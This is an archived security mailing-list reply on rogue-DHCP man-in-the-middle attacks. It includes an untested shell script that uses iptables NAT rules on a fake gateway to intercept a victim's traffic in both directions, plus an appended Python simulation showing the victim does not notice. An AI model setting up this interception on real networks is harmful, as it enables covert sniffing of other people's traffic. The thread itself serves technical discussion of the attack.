Apologies for the long delay on this almost-dead thread ...

At 12:02am Sep 21 rootat_private wrote:

//snip
> A couple of problems with the man in the middle attack
> ------------------------------------------------------
//snip
> Another problem with the attack is that it would only be a one
> way attack as the default gateway assigned by the rogue DHCP
> server is not the real default gateway. The fake gateway would
> need to sniff the packets and rewrite the MAC layer to enable
> the packets to be sent to the correct default gateway. The
> problem would occur with packets being sent from the correct
> default gateway back to the attacked machine as the packets
> would not pass through the rogue gateway, thus can not be
> sniffed. This basically means that all outgoing traffic can be
> sniffed and all incoming traffic can't.
>
> A full man in the middle attack can be established using
> programs such as Dsniff and Ettercap which both utilise ARP
> poisoning to establish the man in the middle attack.
//snip

How about: in order to obtain incoming and outgoing traffic, the fake
gateway assigns the victim an IP address on an unused private subnet,
and NATs the traffic to and from the victim.

#!/bin/sh
# untested code
DHCPASSIGNED=192.168.155.3   # What the real DHCP server assigned
PRIVIP=172.16.155.3          # What the fake server assigned
# The fake gateway has to forward packets (and answer for $DHCPASSIGNED on the LAN)
echo 1 > /proc/sys/net/ipv4/ip_forward
# Incoming: packets for the real address are rewritten to the victim's private address
iptables -t nat -A PREROUTING -d $DHCPASSIGNED -j DNAT --to $PRIVIP
# Outgoing: packets from the victim's private address are rewritten to the real address
iptables -t nat -A POSTROUTING -s $PRIVIP -j SNAT --to $DHCPASSIGNED

(Alternatively, the fake gateway could advertise its route to the victim
via RIP for a neater exploit .. I think.)

&:-)
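The two setups the thread argues about, modelled as an added example (not code from the original post or from any of the tools it names). It simulates one request/reply on a tiny LAN: in the quoted objection's setup the victim keeps its real address and only the default gateway is rogue, so the reply is delivered straight to the victim; in the NAT proposal the rogue box owns the real address and rewrites both directions, so it sees the reply too. The server address, payloads and the LAN ownership table are constructed for the example; the two 192.168.155.3/172.16.155.3 addresses are the ones from the post.

```python
"""Toy model of a rogue-DHCP gateway with and without NAT (added example).

Scheme A (the objection): victim keeps REAL_IP, only its gateway is rogue.
Scheme B (the proposal): victim gets PRIV_IP, the rogue box holds REAL_IP
and NATs both directions, mirroring the PREROUTING DNAT / POSTROUTING SNAT
rules in the post. Hosts, server address and payloads are constructed.
"""
from dataclasses import dataclass, replace

REAL_IP = "192.168.155.3"    # address the real DHCP server would assign (from post)
PRIV_IP = "172.16.155.3"     # address the rogue DHCP server assigns (from post)
SERVER_IP = "198.51.100.10"  # constructed upstream server (TEST-NET-2 range)


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    payload: str


class RogueGateway:
    """Records every packet it forwards; optionally NATs REAL_IP <-> PRIV_IP."""

    def __init__(self, nat: bool):
        self.nat = nat
        self.sniffed = []

    def forward_out(self, pkt: Packet) -> Packet:
        """Victim -> upstream. Mirrors the POSTROUTING SNAT rule when nat=True."""
        self.sniffed.append(pkt)
        if self.nat and pkt.src == PRIV_IP:
            return replace(pkt, src=REAL_IP)
        return pkt

    def forward_in(self, pkt: Packet) -> Packet:
        """Upstream -> victim. Mirrors the PREROUTING DNAT rule when nat=True."""
        self.sniffed.append(pkt)
        if self.nat and pkt.dst == REAL_IP:
            return replace(pkt, dst=PRIV_IP)
        return pkt


def deliver(lan: dict, pkt: Packet):
    """The LAN hands a frame to whichever host currently owns the destination IP."""
    return lan.get(pkt.dst)


def exchange(nat: bool) -> dict:
    """Run one request/reply and report what the rogue gateway got to see."""
    rogue = RogueGateway(nat)
    victim_ip = PRIV_IP if nat else REAL_IP
    # IP ownership on the LAN (what ARP would resolve): with NAT the rogue box
    # answers for REAL_IP, so replies from the real gateway land on it first.
    lan = {victim_ip: "victim", REAL_IP: "rogue"} if nat else {REAL_IP: "victim"}

    # 1. victim sends via its (rogue) default gateway
    req = rogue.forward_out(Packet(victim_ip, SERVER_IP, "GET / HTTP/1.0"))
    # 2. upstream replies to whatever source address it saw
    reply = Packet(SERVER_IP, req.src, "HTTP/1.0 200 OK")
    # 3. the real gateway puts the reply on the LAN; whoever owns reply.dst gets it
    owner = deliver(lan, reply)
    if owner == "rogue":
        reply = rogue.forward_in(reply)
        owner = deliver(lan, reply)
    return {
        "victim_got_reply": owner == "victim",
        "reply_dst": reply.dst,
        "sniffed_out": sum(p.dst == SERVER_IP for p in rogue.sniffed),
        "sniffed_in": sum(p.src == SERVER_IP for p in rogue.sniffed),
    }


if __name__ == "__main__":
    print("gateway-only:", exchange(nat=False))
    print("gateway+NAT: ", exchange(nat=True))
```

In both runs the victim still gets its reply, so the change is invisible to it; the difference is only whether the reply crosses the rogue box. The model leaves out the detail that makes scheme B work on a real LAN: the rogue host must actually own the real address (answer ARP for it) so the real gateway's frames reach it before the DNAT rule can fire.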
This archive was generated by hypermail 2b30 : Fri Oct 04 2002 - 08:54:37 PDT